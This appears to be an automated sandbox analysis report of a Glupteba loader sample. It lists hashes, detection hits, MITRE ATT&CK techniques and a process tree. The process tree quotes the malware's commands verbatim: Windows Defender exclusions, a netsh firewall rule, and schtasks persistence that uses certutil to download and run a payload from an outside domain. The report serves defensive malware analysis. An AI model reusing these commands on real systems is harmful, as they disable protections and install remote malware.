glupteba | 5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

General

Target

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Size

3.9MB
MD5

7fc701478f1d43c3e62ff6d9c434ee77
SHA1

790ba947810a29810ca9d5738abc6b03c9805cce
SHA256

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb
SHA512

d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456
SSDEEP

98304:p1q76W1ZJJMknyymHzEnewyOzDFWmrqwKd:pox1Kkny1Xd2Doe5u

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/620-56-0x00000000012A0000-0x0000000001AA5000-memory.dmp	family_glupteba
behavioral1/memory/620-57-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/620-58-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/620-59-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/1792-65-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/1792-70-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/300-73-0x0000000001190000-0x0000000001995000-memory.dmp	family_glupteba
behavioral1/memory/300-74-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral1/memory/300-75-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\WeatheredWater = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Executes dropped EXE 1 IoCs

Processes:

csrss.exe

pid process

300 csrss.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

432 netsh.exe

pid	process
300	csrss.exe

pid	process
432	netsh.exe

Loads dropped DLL 2 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

pid	process
1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\WeatheredWater = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WeatheredWater = "\"C:\\Windows\\rss\\csrss.exe\""	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Windows directory 2 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	ioc	process
File opened for modification	C:\Windows\rss	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
File created	C:\Windows\rss\csrss.exe	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1924 schtasks.exe
1092 schtasks.exe

pid	process
1924	schtasks.exe
1092	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.execsrss.exenetsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	csrss.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

pid	process
620	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

description	pid	process
Token: SeDebugPrivilege	620	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
Token: SeImpersonatePrivilege	620	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.execmd.exe

description	pid	process	target process
PID 1792 wrote to memory of 888	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	cmd.exe
PID 1792 wrote to memory of 888	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	cmd.exe
PID 1792 wrote to memory of 888	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	cmd.exe
PID 1792 wrote to memory of 888	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	cmd.exe
PID 888 wrote to memory of 432	888	cmd.exe	netsh.exe
PID 888 wrote to memory of 432	888	cmd.exe	netsh.exe
PID 888 wrote to memory of 432	888	cmd.exe	netsh.exe
PID 1792 wrote to memory of 300	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe
PID 1792 wrote to memory of 300	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe
PID 1792 wrote to memory of 300	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe
PID 1792 wrote to memory of 300	1792	5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe	csrss.exe

C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
"C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620

C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe
"C:\Users\Admin\AppData\Local\Temp\5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb.exe"
2⤵
- Windows security bypass
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:432

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:300

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193402.log C:\Windows\Logs\CBS\CbsPersist_20230129193402.cab
1⤵
PID:1768

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Disabling Security Tools

2

T1089

Modify Registry

3

T1112

Credential Access

Discovery

